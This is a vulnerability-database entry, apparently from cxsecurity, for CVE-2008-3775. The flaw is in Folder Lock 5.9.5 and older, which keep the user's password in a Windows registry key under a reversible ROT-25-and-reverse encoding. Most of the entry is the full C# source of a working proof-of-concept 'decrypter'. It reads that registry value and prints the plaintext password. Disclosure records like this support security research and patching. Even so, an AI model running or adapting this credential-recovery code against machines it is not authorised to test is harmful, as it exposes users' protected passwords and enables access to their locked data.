Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Folder Lock <= 5.9.5 Local Password Information Disclosure
2008-08-20 / 2008-08-21
Credit:
Charalambous Glafkos
Risk:
Low
Local:
Yes
Remote:
No
CVE:
CVE-2008-3775
CWE:
CWE-310
Ogólna skala CVSS:
2.1/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
3.9/10
Wymagany dostęp:
Lokalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Brak
Wpływ na dostępność:
Brak
/* * Folder Lock <= 5.9.5 Local Password Information Disclosure * * Author(s): Charalambous Glafkos * George Nicolaou * Date: June 19, 2008 * Site: http://www.astalavista.com * Mail: glafkos_at_astalavista.com * ishtus_at_astalavista.com * * Synopsis: Folder Lock 5.9.5 and older versions are prone to local information-disclosure vulnerability. * Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks. * The security issue is caused due to the application storing access credentials within the Windows registry key: * (HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl) without proper encryption. * This can be exploited to disclose the encrypted _pack password of the user which is ROT-25 and reversed. * * Sample Output: * * ASTALAVISTA the hacking & security community * Folder Lock <= 5.9.5 Decrypter v2.0 * --------------------------------- * Encrypted Password: :3<k_^62`4T- * Decrypted Password: ,S3_15]^j;29 * */ using System; using System.Text; using System.IO; using System.Threading; using Microsoft.Win32; namespace getRegistryValue { class getValue { static void Main() { getValue details = new getValue(); Console.WriteLine("\nASTALAVISTA the hacking & security community\n\n"); Console.WriteLine("Folder Lock <= 5.9.5 Decrypter v2.0"); Console.WriteLine("---------------------------------"); String strFL = details.getFL(); Console.WriteLine(strFL); Thread.Sleep(5000); } private string getFL() { RegistryKey FLKey = Registry.CurrentUser; FLKey = FLKey.OpenSubKey(@"Software\Microsoft\Windows\QualityControl", false); String _pack = FLKey.GetValue("_pack").ToString(); String strFL = "Encrypted Password: " + _pack.Replace("~", "") + "\nDecrypted Password: " + Reverse(Rotate(_pack.Replace("~", ""))) + "\n"; return strFL; } public string Reverse(string x) { char[] charArray = new char[x.Length]; int len = x.Length - 1; for (int i = 0; i <= len; i++) charArray[i] = x[len - i]; return new string(charArray); } public static string Rotate(string toRotate) { char[] charArray = toRotate.ToCharArray(); for (int i = 0; i < charArray.Length; i++) { int thisInt = (int)charArray[i]; if (thisInt >= 65 && thisInt <= 91) { thisInt += 25; if (thisInt >= 91) { thisInt -= 26; } } if (thisInt >= 92 && thisInt <= 96) { thisInt += 25; if (thisInt >= 96) { thisInt -= 26; } } if (thisInt >= 32 && thisInt <= 47) { thisInt += 25; if (thisInt >= 47) { thisInt -= 26; } } if (thisInt >= 48 && thisInt <= 57) { thisInt += 25; if (thisInt >= 57) { thisInt -= 26; } } if (thisInt >= 58 && thisInt <= 64) { thisInt += 25; if (thisInt >= 64) { thisInt -= 26; } } if (thisInt >= 97 && thisInt <= 123) { thisInt += 25; if (thisInt >= 123) { thisInt -= 26; } } charArray[i] = (char)thisInt; } return new string(charArray); } } } Best Regards, Charalambous Glafkos ( nowayout )
Referencje:
http://www.securityfocus.com/bid/30771
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top